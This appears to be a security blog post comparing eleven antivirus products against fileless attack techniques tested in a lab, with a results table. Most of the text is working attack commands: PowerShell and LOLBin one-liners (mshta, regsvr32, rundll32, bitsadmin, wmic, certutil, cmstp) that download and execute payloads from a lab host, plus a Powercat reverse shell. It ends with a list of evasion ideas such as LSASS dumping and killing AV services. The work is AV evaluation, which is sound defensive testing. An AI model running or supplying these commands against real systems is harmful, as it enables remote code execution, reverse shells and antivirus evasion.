Home Fileless malware: AV comparison on fileless attack
Post
Cancel

Fileless malware: AV comparison on fileless attack

I’ve test some fileless command in my lab with AV Protection (Most of them are free/trial version) and here’s the result.

SymbolDescription
✔️Blocked
Bypassed

Fileless techniqueBitdefenderAvastSymantecWebrootESETKarsperskySophosTrendMicroWinDefMalwarebytesPanda Adaptive
koadic mshta✔️✔️✔️
koadic regsvr✔️✔️✔️✔️✔️✔️✔️
koadic rundll32_js✔️✔️✔️✔️✔️✔️✔️
koadic bitsadmin ✔️✔️✔️✔️✔️✔️
koadic disk✔️✔️✔️✔️✔️✔️
koadic wmic✔️✔️✔️✔️✔️✔️✔️
Malicious Powershell line✔️✔️✔️✔️✔️✔️
msvenom msiexec ✔️✔️✔️✔️✔️✔️✔️✔️✔️✔️✔️
msvenom certutil ✔️✔️✔️✔️✔️✔️✔️✔️✔️✔️
msvenom batch ✔️✔️✔️✔️✔️
msvenom cscript (vbs)✔️✔️✔️✔️✔️✔️✔️✔️✔️✔️
Powercat✔️✔️✔️✔️✔️

Testcase

My testcase are mostly using msvenom with metasploit and koadic.

Powershell

Download and execute executable

1
powershell -NoLogo -Command "$webClient = new-object System.Net.WebClient; $webClient.DownloadFile('http://192.168.189.131:7777/evil.exe', '%temp%\evil.exe'); Start-Process -Filepath '%temp%\evil.exe'"

Execute Ps1 file

1
powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\"http://192.168.5.128/a.ps1\");powershell -nop -w hidden -c IEX $e

Powercat

1
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.189.131:7777/powercat.ps1');powercat -c 192.168.189.131 -p 9999 -e cmd"

Msvenom batch

1
powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.189.131:7777/ms.bat'))

Msvenom Vbscript

1
powershell -NoLogo -Command "$webClient = new-object System.Net.WebClient; $webClient.DownloadFile('http://192.168.189.131:7777/ms.vbs', '%temp%\ms.vbs'); Start-Process %windir%\system32\cscript.exe -Filepath '%temp%\ms.vbs'"

Powershell empire stager

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
windows/launcher_bat
windows/launcher_lnk
windows/launcher_sct
windows/launcher_vbs
windows/launcher_xml
windows/backdoorLnkMacro  
windows/macro
windows/bunny             
windows/macroless_msword
windows/csharp_exe        
windows/shellcode
windows/dll               
windows/teensy
windows/ducky
windows/hta

Koadic

Mshta

1
mshta http://192.168.189.131:9999/tT4Fh

Regsvr32

1
regsvr32 /s /u /n /i:http://192.168.189.131:9998/d2XfT scrobj

Bitsadmin

1
bitsadmin /transfer oZHsz /download /priority high http://192.168.189.131:9995/oZHsz.wsf %temp%\oZHsz.wsf & start /wait %temp%\oZHsz.wsf & del %temp%\oZHsz.wsf

Rundll32

1
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://192.168.189.131:9997/eTMXy",false);x.send();eval(x.responseText);window.close();

Wmic

1
wmic os get /FORMAT:"http://192.168.189.131:9996/pMeV8.xsl"
1
wmic process call create "powershell -NoLogo -Command "$webClient = new-object System.Net.WebClient; $webClient.DownloadFile('http://192.168.189.131:7777/evil.exe', '%temp%\evil.exe'); Start-Process -Filepath '%temp%\evil.exe'" "

Others

Certutil

1
certutil.exe -urlcache -split -f http://192.168.189.131:7777/ms.exe ms.exe & ms.exe

Cmstp

1
cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf

Disk payload

New tool by thelinuxchoice

1
2
3
git clone https://github.com/thelinuxchoice/catchyou
cd catchyou
bash catchyou.sh

Others to consider when POC AV (include non fileless)

  1. Powersploit
  2. Powertools
  3. Powerview
  4. Others powershell invoking module
  5. Powershell script
  6. Veil evasion
  7. Cobalt Strike payloads
  8. Metasploit various payloads
  9. Maldoc
  10. Exploit
  11. Process injection
  12. Credential harvesting tools
  13. LSASS dump
  14. Disable, kill, sleep AV services/process behavior
  15. Modifying AV registry
  16. Refer Mitre for more ideas

Note

Msvenom payload may easily detect by AV because of it’s popularity used by many attacker and well recognized by its pattern.

This post is licensed under CC BY 4.0 by the author.